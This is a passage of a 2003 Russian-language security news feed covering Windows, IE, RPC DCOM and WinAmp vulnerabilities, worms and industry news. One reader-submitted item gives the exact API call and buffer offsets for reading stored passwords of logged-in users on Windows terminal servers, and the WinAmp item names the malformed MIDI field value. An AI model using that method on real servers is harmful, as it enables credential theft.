На сайте CITFORUM опубликована интересная статья Crispin Cowan (см. предыдущую новость - создатель StackGuard) "Безопасность систем с открытым кодом", которая была опубликована в августовском номере (#7) журнала "Открытые системы". Споры о том, приводит ли открытие кода к усилению или ослаблению безопасности программного обеспечения, длятся годами. Ни одно из этих утверждений нельзя считать абсолютной истиной: свободно распространяемое программное обеспечение открывает более широкие возможности и перед хакерами, и перед специалистами по безопасности. К счастью, существуют определенные технологии для систем с открытым кодом, которые могут помочь специалистам усилить защищенность своих решений. Обзору безопасности открытых систем, а также методам и инструментам защиты программ, поставляемых в исходниках и посвящена статья. Статья - http://www.citforum.ru/security/articles/open_source/
12/09/2003 13:08 Методы обхода защиты от переполнения буфера в Windows2003.
Известный специалист по компьютерной безопасности Дэвид Литчфилд от лица руководимой им компании NGSSoftware Ltd. опубликовал в Интернет очередное очень интересное (и, думается, для многих полезное) исследование, проведённое его компанией в части безопасности новой ОС Windows 2003. Это исследование затрагивает новую технологию, которая была применена в этой ОС для предотвращения переполнения буфера - основной причины большинства обнаруживаемых уязвимостей как в ПО, так и в различных компонентах самих ОС. Подобную защиту, например, в ОС Linux выполняет заплата Openwall, которую выпускает и поддерживает SolarDesigner (www.openwall.org). В Win2003, как написано в исследовании, защита основана на механизме, подобном StackGuard (автор Crispin Cowan). Механизм защиты основан на cookies (второе название canary), которые выставляются в стэке перед сохранённым адресом возврата при вызове функции. При перезаписи адреса возврата (типичная ситуация переполнения буфера) происходит также перезапись этого значения cookie. Перед выполнением возврата по адресу, который хранится в стеке происходит проверка значения cookie в стеке и сохранённого значения в секции .data модуля, вызвавшего функцию. Вот как раз описанию механизма формирования сookie и методов обхода механизма защиты Win 2003 и посвящён выпущенный документ. Представлен в PDF-формате. Документ - http://www.nextgenss.com/papers/defeating-w2k3-stack-protection.pdf
12/09/2003 12:04 Sony PlayStation стандарта GSM900/1800?
Судя по опубликованной на сайте Special Reserve информации – Sony, со слов своего исполнительного директора Кена Кутараги, планирует добавить функциональность сотового телефона в свою грядущую мобильную игровую приставку PSP (PlayStation Portable). Известно также о добавлении встроенной фотокамеры. Коротко резюмируя свое выступление Кутараги назвал PSP «Walkman 21 века». Вопросов после прочтения этой новости возникает больше, чем ответов. Для какого стандарта и региона будет разработано это решение? Под какой торговой маркой будет продаваться консоль:Sony или SonyEricsson? Вряд ли Sony будет наступать на наго своей дочке - вопрос остается открытым. Очевидно, что без мобильного телефона себя не мыслит ни один современный тинейджер, эту простую правду уже осознали все участники рынка мобильных игровых приставок, а некоторые производители сотовых телефонов задумались о нужде подрастающего поколения в игровых приставках. Так компания Nintendo объявила о дополнении своей приставки GameBoy Advance модулем Bluetooth для игры с партнером через сотовую сеть или напрямую через радиоканал. Nokia вышла встречным предложением, не только разработав (а фактически только проведя правильную маркетинговую компанию) игровую консоль N-Gage, но и купив добрую половину компании Sega, специализирующаяся на многопользовательских играх, но заодно и прикупив портал Sega.com. SonyEricsson пошла на гребне волны за ураганом N-Gage и выпустила геймпад для телефона Z600, что позволит расширить возрастную категорию продукции без риска полного провала. Мало кто помнит, но у Ericsson была ранняя инициатива по созданию гибрида сотового телефона и мобильной игровой приставки под названием Red Jade – сейчас Интернет наполняют лишь отрывки текста о причинах сворачивания проекта. Источник - http://www.mobile-review.com
12/09/2003 11:32 SAP организует онлайновую сеть для разработчиков.
Компания SAP, производитель корпоративного ПО, на своей ежегодной конференции разработчиков объявила об открытии онлайновой сети, которая будет способствовать сотрудничеству между разработчиками ПО и заказчиками. Во вторник на конференции TechEd в Лас-Вегасе члены правления SAP Шай Агасси и Питер Зенке много говорили об усилиях компании, направленных на то, чтобы помочь заказчикам в разработке приложений. Агасси то и дело повторял, что новая сеть SAP Developer Network создана «разработчиками для разработчиков». По оценке SAP, свыше миллиона разработчиков ПО работает над приложениями для систем планирования корпоративных ресурсов (ERP) и управления взаимоотношениями с заказчиками (CRM) компании. «Это рабочий канал для заказчиков, — сказал Агасси. — Он устанавливает новый уровень отношений SAP с разработчиками и разработчиков друг с другом». Источник - http://www.znet.ru
12/09/2003 11:24 Получение паролей терминальных сессий.
От посетителя сайта с ником cofe получено сообщение о возможности получения паролей терминальных сессий Windows. Далее цитирую автора: "На терминальных серверах MS Windows (в том числе и с Citrix MetaFrame) существует возможность получения паролей залогиненых пользователей (даже если сессия имеет статус disconnect), которые хранятся в настройках терминальных сессий. Для этого надо вызвать функцию WinStationQueryInformation(hServer, dwSessionId, 1, pBuf, dwBufSize, pRetLen). Где hServer - дескриптор целевого сервера, либо NULL если это текущий сервер; dwSessionId - идентификатор целевой сессии; 1 - тип запрашиваемой информации; pBuf - указатель на буфер для запрашиваемой информации; dwBufSize - размер буфера; pRetLen - указатель на переменную, куда будет записано кол-во байт, записанных в буфер. WinStationQueryInformation экспортируется системной библиотекой winsta.dll. В результате мы получим: DomainName = pBuf + 174, UserName = pBuf + 132, Password = pBuf + 210. Следует отметить, что таким образом будет получен именно сохраненный в настройках терминального коннекта пароль. Т.е. если реальный пароль отличается от сохраненного и вводится ручками при логине на сервер, то описанным способом получить реальный пароль не получится". Желающие могут проверить этот метод. Источник - Информация посетителя сайта.
12/09/2003 10:47 Хакеры отметили 11 сентября партией новых компьютерных вирусов.
Хакеры отметили очередную годовщину событий 11 сентября в свойственной им манере, выпустили в сеть партию новых интернет-вирусов. Как сообщает агентство Reuters, эксперты по электронной безопасности, предупреждают, как минимум, о двух известных "червях" распространяющихся в сети - Neroma и Vote.K. Вирусы распространяются вместе с электронной почтой. Специалисты характеризуют степень их опасности как незначительную, однако советуют с осторожность относиться ко всем посланиям, содержащим ссылки на 11 сентября. Так, в поле "тема" вируса Neroma обычно стоит фраза "It's Near 911!" и приложение 911.jpg с описанием "Nice butt baby!". Вирус сканирует адресную книгу Microsoft Outlook Express и уничтожает ряд фалов операционной системы. Vote.K содержится в письмах с темой "THE WAR HAS STARTED!". Он также пытается удалить незащищенные файлы. Подробнее - http://www.reuters.com/newsArticle.jhtml?type=internetNews&storyID=3428560
11/09/2003 17:13 Конкурс статей "BugTraq 3/4".
BugTraq.Ru совместно с компанией Digital Security и издательством "Питер" объявляет о начале конкурса на лучшую статью "BugTraq 3/4". 3/4 - поскольку продлится он с сентября 2003 года по май 2004. На конкурс принимаются оригинальные, ранее не публиковавшиеся в онлайне статьи (возможное исключение - публикация на сайте автора, последующая републикация их вполне возможна при условии сохранения ссылки на оригинал; оффлайновые материалы могут быть приняты на конкурс в случае согласия издания, первым его опубликовавшего). Разумеется, тематика статей должна совпадать с тематикой сайта. Срок принятия материалов - с сентября 2003 года по апрель 2004. До мая 2004 продлится онлайновое голосование, предназначенное для выявления 10 финалистов, из которых компетентным жюри будут выбраны победители. И, самое главное, о призах. Победитель конкурса в качестве приза получит полный комплект учебных курсов и справочников, выпускаемых Digital Security. Участник, занявший второе место - комплект из трех дисков по выбору, занявший третье - один диск по выбору. Кроме того, издательство "Питер" учреждает отдельный "приз зрительских симпатий", которым награждается победитель онлайнового голосования, а также дополнительный приз победителю финала. В качестве призов выступают выбранные победителями книги компьютерной тематики, выпущенные издательством "Питер". Подробности - http://www.bugtraq.ru/library/contest/
11/09/2003 16:34 Сканер уязвимости RPC DCOM.
В дополнение к предыдущей новости приводим ссылку на RPC-сканер, который выпущен компанией eEye Digital Security. Сканер был выпущен после выхода предыдущего бюллетеня по безопасности MS03-026, в котором описывалась уязвимость в самой службе RPC. После выхода описания уязвимости службы DCOM, которая функционирует через сервис RPC был доработан и сам сканер, версия 1.1.0 которого обнаруживает новую уязвимость. Необходимо отметить, что free версия сканера сканирует сети класса С без устранения уязвимости. Стоимость на сканер сети С с устранением уязвимости уже довольно серьёзная - 995$, для сетей класса В и А - ещё прокруче - 4.995$ и 7.995$ соответственно. Для получения сканера необходимо пройти процедуру регистрации. Сканер - http://www.eeye.com/html/Research/Tools/RPCDCOM.html
11/09/2003 15:27 Подробное описание уязвимости в RPC DCOM.
После опубликования M$ бюллетеня MS03-039 компания eEye Digital Security, которая, собственно, обнаружила и исследовала эту уязвимость посчитала свои долгом опубликовать подробности этой уязвимости и технологию эксплоита её. Эксплоит осуществляется при помощи DCERPC "bind" пакета, после которого следует специально сформированный "DCOM object activation request" пакет. Собственно, само внедрение кода осуществляется путём манипуляций длиной поля внутри активационного пакета. Более подробное (можно сказать подробнейшее) описание доступно по ссылке, приведённой ниже. Подробности - http://www.eeye.com/html/Research/Advisories/AD20030910.html
11/09/2003 15:17 Порция багов в Internet Explorer.
Господин из Китая Liu Die Yu "осчастливил" мировое секьюрити-сообщество, опубликовав сразу аж 13 уязвимостей в популярном броузере небезызвестной фирмы Internet Explorer. Как пишет сам автор, он проверял их в версии 6.0.2600.0000 с патчем Q810847 в китайской версии WinXP. Пересказ всех их занял бы довольно много места, да и довольно непросто их все описать, поэтому просто позволим себе привести ссылку на сайт уважаемого господина ЗАРАЗы, где на страничке которого все описания уязвимостей сведены вместе. Подробнее - http://www.security.nnov.ru/search/news.asp?binid=3110
11/09/2003 14:30 Троянец маскируется под обновление "Касперского".
"Лаборатория Касперского" предупредила пользователей о регистрации в Рунете массовой спам-рассылки троянской программы-шпиона Puppy. Однако на данный момент пока не зарегистрировано случаев заражения этой вредоносной программой. Puppy доставляется на компьютер в электронных письмах в виде вложенного файла UPDATE.EXE. Заголовок письма содержит фразу "Антивирус ВИРУС-911", а тело письма - текст, согласно которому в прилагаемом файле находится обновление для “Антивируса Касперского”. Файл UPDATE.EXE содержит вредоносный код, который непосредственно внедряет на компьютер программу-шпиона Puppy. Если пользователь имел неосторожность запустить этот файл, то на диск записывается копия Puppy и регистрируется в секции автозапуска системного реестра Windows. После этого троянец сканирует компьютер в поиске системных паролей, паролей доступа в интернет и другой конфиденциальной информации. Собранные данные незаметно для владельца компьютера отсылаются на анонимный адрес одной из публичных служб электронной почты. Источник - http://www.cnews.ru
11/09/2003 14:02 Три удаленных переполнения буфера в Microsoft Windows.
Три уязвимости обнаружено в Microsoft Windows в DCOM интерфейсе. Удаленный атакующий может выполнить произвольный код на системе через 135-139, 445, 593 порты и в некоторых случаях через 80(http) и 443(https) порты. Уязвимости воздействует на DCOM (Distributed Component Object Model) интерфейс внутри RPCSS службы и связаны с переполнением буфера и неопределенной ошибкой при обработке RPC сообщений. Две из обнаруженных уязвимостей связанны с переполнением буфера. В результате удаленный атакующий может выполнить произвольный код на уязвимой системе с root привилегиями. Третья может использоваться для аварийного завершения работы RPCSS службы. Уязвимость может эксплуатироваться через 135 (tcp/udp), 137 (udp),138 (udp), 139 (tcp), 445 (tcp/udp),593 (tcp) порты. Также если если на сервере включена служба COM Internet Services (CIS), то уязвимость может эксплуатироваться через 80 и 443 TCP порты. Уязвимости присутствуют в ОС: Win2K (все версии), NT 4.0 (все версии), 2003 (все версии), XP (аналогично). M$ выпущен соответствующий бюллетень по безопасности с кодом MS03-039, в котором, в том числе, приведены и ссылки на патчи для каждой ОС. Подробный перевод получен с securitylab.ru. Подробности - http://www.microsoft.com/security/security_bulletins/ms03-039.asp
11/09/2003 13:30 Проблемы с SP4 для Windows 2000.
Как сообщает compulenta.ru, компания Microsoft опубликовала информацию о ряде проблем, возникающих после установки четвертого пакета обновлений для операционной системы Windows 2000. В статье Microsoft Knowledge Base 827664 описывается проблема, приводящая к сбросу установок локальной политики безопасности. Объясняется это тем, что в SP4 в систему добавляются несколько новых пунктов в правах пользователей, и процесс обновления политики безопасности проходит не вполне корректно. Проблема, описанная в статье номер 818528, связана с работой терминальных служб и сводится к тому, что при совместном доступе к файлу и закрытии его одним пользователем, файл закроется и для всех остальных. Это происходит из-за того, что Windows 2000 учитывает число подключений по компьютерам, и если несколько человек работают с документом через один терминальный сервер, это расценивается как одно подключение. Последняя проблема описана в статье 824309 и проявляется в виде чрезмерно долгой аутентификации пользователя при подключении к пакетам Citrix MetaFrame или Citrix 1.8, работающим на компьютере с Windows 2000. Ccылки на все 3 статьи приведены ниже. Ссылка 1 - http://support.microsoft.com/?kbid=827664 Ссылка 2 - http://support.microsoft.com/?kbid=818528 Ссылка 3 - http://support.microsoft.com/?kbid=824309
11/09/2003 13:27 В Великобритании арестованы создатели интернет-червя, лишившего экономику 5,5 миллионов фунтов.
Власти Великобритании обвинили 20-летнего Джордана Брэдли и 22-летнего Эндрю Харви в создании компьютерного вируса ТК, ущерб от которого составил 5,5 миллионов фунтов стерлингов, сообщает BBC. Брэдли и Харви были арестованы в феврале этого года в результате совместной операции американских и британских правоохранительных органов. Первое судебное заседание по делу вирусописателей, подозреваемых в причастности к международной хакерской группе THr34t-Krew, назначено на 18 сентября. По сведениям представителя Национального отделения Великобритании по расследованию преступлений в сфере высоких технологий, инкриминируемое Брэдли и Харви деяние, могло быть совершено с января 2002 по февраль 2003 года. Общее число компьютеров, пораженных TK, составило около 18 тысяч. Источник - http://www.viruslist.com
11/09/2003 12:23 Один из основателей Sun Билл Джой уволился по собственному желанию.
Американский ученый Билл Джой (Bill Joy), считающийся одним из тех, кто стоял у истоков современного Интернета, уволился из компании Sun Microsystems после 21 года работы в ней, сообщает газета Washington Post. Джой является одним из основателей Sun - компьютерного гиганта, внесшего значительный вклад в развитие современных информационных технологий. За время работы в этой компании он был ведущим разработчиком технологии Java, принимал участие в разработке процессоров SPARC и ПО Solaris. До основания Sun в 1982 году он разработал модификацию операционной системы UNIX под названием Berkeley - эта система долгое время использовалась в качестве основной системы для подключенных к Сети машин, с нее началось распространение популярной ныне концепции открытых исходных кодов программ ("open source"). Джой, которому сейчас 48 лет, заявил, что увольняется из-за того, что устал работать с масштабными крупнобюджетными проектами и хочет поработать в свое удовольствие над проектами собственными. В частности, как пишет Washington Post, его интересуют вопросы компьютерной безопасности. Источник - http://www.lenta.ru
11/09/2003 12:15 Microsoft призналась в беззащитности перед вирусами вида Blaster.
Недавнее наступление в сети Интернет различных вариантов компьютерного вируса Blaster может повториться. С таким предупреждением, как сообщается на сайте BBC News, выступили специалисты по электронной безопасности корпорации Microsoft. По мнению экспертов, "заплатка", выпущенная компанией с целью нейтрализации воздействия вирусов типа Blaster и LovSan не может гарантировать абсолютную безопасность некоторых версий Windows. Новые виды "червей" могут поразить те же компоненты системы, которые подверглись последней успешной атаке, поскольку не все бреши были перекрыты. Нападению могут подвергнуться следующие версии операционной системы: Windows NT Workstation 4.0, Windows NT Server 4.0, Windows NT Server 4.0 (Terminal Server Edition), Windows 2000, Windows XP, Windows Server 2003. Эксплуатация Windows 95, 98 и Windows Me безопасна, так как эти операционные системы недоступны для данного типа вирусов. В любом случае, эксперты рекомендуют воспользоваться официальным сайтом Microsoft для установки новых "заплаток". Однако, тем не менее, хотелось бы от себя (ньюсмейкер команды UINC) добавить, что прекращение M$ поддержки ОС Wun98 (должна была прекратиться в янавре следующего года, но специалисты заметили, что заплатки для этой версии ОС уже не выпускаются) может привести к тому, что технология, апробированная на примере червя Blaster, может быть применена в этой версии ОС. При этом довольно большая группа пользователей, не перешедших на ОС WinXP (в силу ряда причин - в том числе глюкавости этой ОСи) может остаться беззащитной, о чём сейчас ведётся большая дискуссия в BUGTRAQ. Подробности - http://news.bbc.co.uk/2/hi/technology/3099302.stm
10/09/2003 16:01 Украина борется с компьютерными пиратами.
Силами столичного управления по борьбе с экономическими преступлениями разоблачен цех по производству пиратских DVD-дисков. Он находился в подвальных помещениях магазинов "Арка CD" и "Арка Видео" г. Киева на улице Прорезная, 4. В подвалах осуществлялось укомплектование контрафактных экземпляров аудиовизуальных произведений, музыкальных фонограмм, компьютерного программного обеспечения и баз данных на оптических носителях информации. По сообщениям представителей правоохранительных органов, изъято 14944 CD и музыкальных компакт-дисков, а также 4705 DVD. Конфискованы также средства производства - три компьютерных системных блока. В целом изъято товарно-материальных ценностей на сумму более 430 тыс. грн (~81K$). По данному факту будет возбуждено уголовное дело. Источник - http://www.crime-research.ru
10/09/2003 15:37 Вышел почтовый клиент Mozilla Thunderbird 0.2.
Вышел второй релиз stand-alone варианта Mozilla Mail. Из нового: увеличение скорости работы и уменьшение размера (Windows-версия "похудела" почти на 1.5 Mb), улучшена тема, установленная по-умолчанию (новые иконки из Mozilla Firebird, тема разработана на основе темы Qute), улучшена работа проверки орфографии, переработан диалог опций, более гибкая настройка интерфейса, повышена стабильность. Источник новости - тот же LOR. Подробности - http://www.mozilla.org/projects/thunderbird/release-notes.html
10/09/2003 15:21 Музей истории Linux.
Как сообщается на linux.org.ru, электронная библиотека ibiblio создала "музей истории Linux", собрав всевозможные ранние дистрибутивы всеми нами любимой ОС. Дистрибутивы включают ранние версии RedHat, Debian, SuSe, а также мало кому известные Manchester Computing Center (MCC) and Softlanding Linux Systems (SLS). Некоторые из дистрибутивов прекрасно работают на "трешках" с 2-4 Мб оперативки. Подробнее - http://www.ibiblio.org/pub/historic-linux/
10/09/2003 15:09 Будущее антивирусов предрешено.
Сотрудники британского подразделения лаборатории Hewlett-Packard считают, что у антивирусных программ не слишком радужные перспективы развития. Если методы их работы сохранятся, то вскоре такой софт может вообще исчезнуть с компьютеров. Как отмечает группа исследователей под руководством Мэтью Вильямсона, причина всех проблем кроется в том, что практически все современные антивирусные программы работают по принципу обновления баз данных. Пользователям регулярно приходится загружать обновления. При этом, за время изготовления соответствующего апдейта вирус успевает поразить тысячи компьютеров. Как это было в случае со Slammer, эпидемия которого разразилась в январе. Более того, многие пользователи вследствие плохой связи с Интернетом просто-напросто отключают функцию автоматического обновления, что автоматически делает их машины уязвимыми. С другой стороны, с течением времени размер антивирусных баз увеличивается настолько, что даже на мощных компьютерах резидентные агенты существенно замедляют работу. Чтобы решить все эти проблемы необходимо полностью пересмотреть саму концепцию антивирусов, пишет New Scientist. Источник - http://www.runet.ru
10/09/2003 13:52 Лед тронулся? Китай обрушился на спамеров.
Проблема электронного спама разбудила Китай, и там заблокировали разом 127 серверов, признанных источником непрошеной электронной почты в особо крупных размерах. Этот шаг, вероятно, заставит содрогнуться международное сообщество спамеров, которые раньше считали Китай безопасным прибежищем для своих центров. Многие спамеры устанавливали серверы в Пекине и его окрестностях, так как были уверены, что рука западных законов туда не дотянется, а китайским властям до этого нет дела. Но теперь ситуация в корне изменилась. Во вторник Китайское интернет-общество (ISA) объявило, что заблокировано 127 серверов, восемь из которых находятся в Китае, 90 — в Тайване и 29 — в других странах. Любые электронные письма, отправленные этими серверами, автоматически отсекаются от китайских пользователей интернета. Представитель ISA Рен Цзинцян заявил агентству новостей Синьхуа: «Это первая крупномасштабная блокада спамеров, предпринятая китайской интернет-индустрией». Источник - http://www.zdnet.ru
10/09/2003 13:49 В Microsoft плохо залатали Internet Explorer.
На нынешней неделе в Сети появилась информация об обнаружении новой дыры в браузере Internet Explorer. По своим характеристикам она весьма напоминает дыру, связанную с неправильным определением типа объекта, внедренного в веб-страницу с тэгом ObjectData. Эта дыра, позволяющая хакеру запустить на компьютере жертвы произвольный код, была исправлена патчем, описанным в бюллетене безопасности MS03-032. Однако на нынешней неделе анонимный специалист, скрывающийся под псевдонимом http-equiv, выпустил код, наглядно демонстрирующий, что Internet Explorer даже в случае установки самых последних обновлений уязвим для атаки, очень напоминающей атаку на дыру ObjectData. В настоящее время в интернете имеются несколько демонстрационных страниц, содержащих примеры использования дыры. А компания Secunia сообщила об обнаружении использующего дыру кода в "диком" виде. Некие злоумышленники используют новый вариант дыры в ObjectData для рассылки и активизации троянской программы. В качестве меры по нейтрализации уязвимости эксперты по безопасности рекомендуют отключить в Internet Explorer поддержку ActiveX до выпуска Microsoft нового патча или вообще отказаться от использования этого браузера. Дыра актуальна для Internet Explorer версий 5.01, 5.5 и 6. В Windows Server 2003 дыра менее опасна, так как Internet Explorer по умолчанию работает в этой ОС в режиме повышенной защищенности. Тем не менее, пользователям рекомендуется проверить свой компьютер на наличие дыры. Подробности - http://www.secunia.com/advisories/9580/
10/09/2003 11:40 Открытое письмо главы SCO к разработчикам свободного ПО.
На этой неделе генеральный директор компании SCO Дарл Макбрайд опубликовал открытое письмо, адресованное всем участникам сообщества open source. В письме Макбрайд указывает на два недавних события, способных, по его мнению, серьезно подорвать доверие к открытому ПО как со стороны общественности, так и со стороны крупных корпораций. Первое из этих событий - DoS-атака, в конце августа выведшая из строя сайт SCO. Комментируя это событие, глава SCO процитировал слова известного деятеля сообщества open source Эрика Реймонда, который однозначно заявил, что организатор атаки принадлежит к сообществу open source. По мнению Макбрайда, данный факт отнюдь не добавляет сообществу привлекательности в глазах корпораций. Макбрайд также выразил Реймонду благодарность за призывы к прекращению атаки, но отметил, что неплохо было бы сообщить властям имя хакера. Второй факт, ставящий под удар позиции сообщества открытых исходников - это признания другого известного деятеля open source - Брюса Перенса. В оконце августа в интервью изданию ComputerWire он признал, что в ходе разработки Linux действительно была допущена ошибка, когда код Unix System V был перенесен в ядро сотрудником компании SGI. И хотя меры по устранению "чужеродного" кода были приняты, Макбрайд утверждает, что это не меняет дела. Перенос кода штатным работником SGI имел место, значит, имело место и нарушение SGI контрактных обязательств со SCO. По словам Макбрайда, в настоящее время SCO и SGI обсуждают пути решения данной проблемы. Подробности - http://www.sco.com/company/openletter/
10/09/2003 10:33 Subscribe.ru запускает дискуссионные листы.
Форум или конференция уже стали обязательным атрибутом каждого сайта, причем некоторые из них превращаются в настоящие энциклопедии, содержащие мнение множества экспертов. Перенести «коллективный разум» из одного источника (конференции веб-сайта) ко всем участникам решили в петербургской компании Internet Projects, владеющей информационным каналом Subscribe.ru. Сервис дискуссионных листов существует на известном портале Yahoo!, а в российском интернете его полноценных аналогов до сих пор не существовало. Однако в России с помощью дискуссионных листов уже координируются усилия, например, пеших туристов или создателей веб-сайтов. Такой серьезный игрок, как Subscribe.ru, впервые обращает внимание на это направление mail-общения. Так же, как и обычные рассылки, дискуссионные листы будут получать по электронной почте только те пользователи, которые изъявили такое желание и оформили подписку. Как и на многих форумах и конференциях, в листе существуют возможности регулирования хода дискуссии, ее модерации. Однако вмешиваться в ход общения сможет только автор дискуссионной рассылки. Сами письма с продолжением начатой дискуссии будут приходить подписчикам в текстовом формате и с той же темой, что и начальное письмо. Среди тем, которые можно будет обсудить в дискуссионных листах Subscribe.Ru – экономика и бизнес, компьютеры и ПО, наука и техника, культура и искусство, спорт и отдых. Bcточник - http://www.subscribe.ru
9/09/2003 16:15 Уязвимость в WinAmp.
Luigi Auriemma cообщает о существовании уязвимости в популярном медиа-плеере WinAmp, выпускаемом и поддерживаемом Nullsoft. Для проигрывания MIDI-файлов этот плеер использует плагин IN_MIDI.DLL. При этом удалённый атакующий, сформировав в MIDI-файле значение поля (4 байта) "Track data size" в виде 0xffffffff, получает возможность выполнения произвольного кода в системе жертвы. Однако, сам автор уязвимости пишет, что не существует единого эксплоита для этого типа файлов, поскольку поведение системы зависит от того, каким методом производится открытие файла: перетаскиванием иконки, открытием файла в плеере, либо midiOut и DirectMusic. Уязвимость обнаружена в Winamp 2.91, использующем IN_MIDI.DLL 3.01. Подробности - http://aluigi.altervista.org/adv/winamp-midi-adv.txt
9/09/2003 15:24 Создатели вирусов готовятся к 11-му сентября.
В Сети появился вирус, эксплуатирующий печальную для США тему терактов, произошедших в Нью-Йорке почти год назад, 11 сентября. Хотя червя, получившего название W32/Neroma@MM или Worm/Icebut.A, антивирусные компании не относят к категории представляющих серьезную угрозу, вполне возможно, что приближающаяся годовщина может показаться привлекательной для других вирусописателей, и в Сети появятся новые, более опасные вирусы. Как и многие другие, этот червь автоматически рассылается по адресной книге почтовой программы Microsoft Outlook. По данным антивирусной компании Sophos, опасное письмо приходит по электронной почте с заголовком 'It's Near 911!'. В теле письма содержится текст 'Nice butt, baby!', к письму приложен файл с ложным расширением .jpg. Вирусописатель рассчитывает на то, что получатель письма захочет открыть картинку. Однако на самом деле в приложении содержится не картинка, а исполняемый файл, который после запуска заражает компьютер. Несколько раз в месяц, а именно 1-го, 4-го, 8-го, 12-го, 16-го, 20-го, 24-го и 28 числа Neroma пытается стереть хранящиеся на компьютере файлы. «Данная вредоносная программа, будучи запущенной, может иметь неприятные последствия для владельца зараженной машины, - пояснили CNews.ru в «Лаборатории Касперского». - Однако мы расцениваем эту вредоносную программу как не представляющую реальной угрозы для пользователей, так как червь технически примитивен, и случаи заражения им не зафиксированы». По мнению специалистов «Лаборатории Касперского», нельзя исключать возможность появления других вредоносных программ, эксплуатирующих тему 11 сентября. Также как нельзя исключить и появления вирусов, использующих темы других страшных событий. Однако связи между громким названием и масштабами распространения вредоносной программы не существует. Вирусописатели – это хулиганы. Им часто не хватает технических знаний для создания собственного вируса, а "прославиться" хочется. В результате получаются сотни однотипных вирусов, созданных специальными программами-генераторами, все они различаются между собой лишь громкостью эксплуатируемых тем. Источник - http://www.cnews.ru
9/09/2003 14:40 Разгорается война между российскими порталами bugtraq.ru и hackzone.ru.
В очередной раз сайт hackzone.ru уличен в банальном воровстве, на этот раз претензии к нему выдвигает bugtraq.ru. Но на этот раз, в отличие от многочисленных подобных случаев, потерпевшие не жалают закрывать глаза на факты воровства или решать вопрос миром (www.securitylab.ru). Как пишет в письме сам Дмитрий Леонов ака dl, "Собственно, именно копирайтные вопросы стали причиной моего следующего подхода к снаряду. С удивлением я узнал, что некоторые заметки RSN, оказывается, копируются на хакзоне один в один. Причем узнал из писем с вопросами, не означает ли это мое возвращение в данный проект. Пришлось популярно объяснить ребятам, что использование плодов чужого труда (который в данном случае включает, как минимум, перевод, выжимку информации и комментарий "по поводу") предполагает и легкую благодарность в виде простановки ссылки на оригинал. Но урок не пошел впрок. На прошлой неделе мне стало известно об очередном факте кражи материалов с багтрака (на сей раз пострадал достаточно известный фрагмент нашей книги "Атака на Internet", часто оформляемый в виде отдельной статьи). Поверхностная проверка сайта увеличила список спионеренных статей, после чего модератору было предложено либо снять указанные статьи, либо проставить в них имена подлинных авторов вместе с ссылками на первоисточник - стандартные требования к републикациям материалов, не правда ли. Через некоторое время модератор заявил, что не имеет полномочий на подобные действия (видимо, их достаточно только для одобрения ворованных статей, а не их снятия), и предложил обратиться к "главному админу", ответа от которого не последовало до сих пор". C полным текстом статьи можно ознакомиться на сайте Дмитрия bugtraq.ru. Cо своей стороны хотелось бы заметить, что наша команда целиком на стороне Дмитрия. Нам и самим приходилось неоднократно иметь дело с плагиаторами, которые "заимствовали" либо новости (не чужие, а переведённые ньюс-мейкерами нашей команды), но до сих пор все взаимные споры решались мирным путём. Подробности - http://www.bugtraq.ru/rsn/archive/2003/09/11.html
9/09/2003 13:44 Пять лет и 39325$.
Трое жителей австралийского Сиднея приговорены судом к тюремному заключению сроком на пять лет и штрафу в 39325 долларов США по обвинению в нарушении авторских прав. Это первый подобный случай в области мировой судебной практики, имеющий отношение к борьбе с онлайновым пиратством. Девятнадцатилетний Томми Ли и двадцатилетние Питер Тран и Чарльз Кок Хау Нь выступили ответчиками по обвинению в нарушении авторских прав компаний Universal Music, Sony, Warner, BMG, EMI и Festival Mushroom Music. Cоздатели сайта "MP3 WMA Land" разместили в бесплатном доступе в сети музыку общей стоимостью около 60 млн. долларов США. Представитель Группы по расследованию музыкального пиратства (MIPI) Майкл Спек заявил, что "данный процесс является важным доказательством того, что возможность поимки пиратов, даже при условии соблюдения ими анонимности, тем не менее, существует". Спек добавил, что этот случай наглядно демонстрирует готовность судов видеть в онлайновом пиратстве факт незаконного использования частной собственности. Источник - http://www.sysadmins.ru
9/09/2003 12:30 Электронный журнал "Спамтест" No.1.
На сайте "Лаборатории Касперского" опубликован первый номер электронного журнала "Спамтест", который является детищем недавно созданного консорциума по борьбе со спамом, который включает в себя: компанию "Ашманов и Партнеры", "Лабораторию Касперского", национальную почтовую службу Mail.ru. Cам журнал выпускает как раз "Ашманов и Партнёры" при технической и идеологической поддержке службы Subscribe.ru. На страницах журнала будут рассмотрены методы и уловки спамеров, разнообразные виды спама, проанализированы различные подходы к эффективному противодействию спаму. Важной частью проекта станет регулярная публикация аналитических материалов, интересных владельцам почтовых серверов, системным администраторам организаций и фирм, интернет-провайдерам, желающим оградить своих пользователей от спама и существенно снизить несанкционированный трафик. Первый номер представляет собой вводную часть, в которой описываются задачи и цели нового электронного журнала. Думается, больший интерес журнал будет представлять для СИСАДМИНов, вынужденных в силу специфики своей работы бороться со спамом. В рамках проекта (как мы писали ранее) создан специальный сайт www.spamtest.ru. Журнал - http://www.kaspersky.ru/news.html?id=1329437
9/09/2003 12:06 Хакеры атаковали сайты крупнейшего интернет-провайдера США.
Американская хостинговая компания Interland, являющаяся одним из крупнейших мировых интернет-провайдеров, подверглась на минувшей неделе мощной хакерской атаке, сообщает сайт Help Net Security. По мнению Марка Маифретта (Marc Maiffret), одного из руководителей компании eEye Digital Security, занимающейся производством программного обеспечения для защиты от несанкционированного проникновения в сети, около 1100 сайтов Interland оказались заражены вредоносным скриптом. Особенность опасной программы заключается в том, что она способна самовосстанавливаться после удаления. Посещавшие атакованные сайты пользователи рисковали установить зараженный скрипт на свои компьютеры. В Interland факт атаки отрицают и говорят, что речь идет всего лишь о нескольких сайтах, оказавшихся недоступными. Маифретт полагает, что значительную часть посетителей атакованных сайтов в ближайшее время могут ожидать неприятные сюрпризы. Кому-то достанется телефонный счет на очень крупную сумму, а кому-то предстоит узнать о собственном участии в DoS-атаке на неизвестный компьютер. Подробности - http://www.net-security.org/news.php?id=3524
9/09/2003 11:22 Новая технология защиты документов в Office 2003.
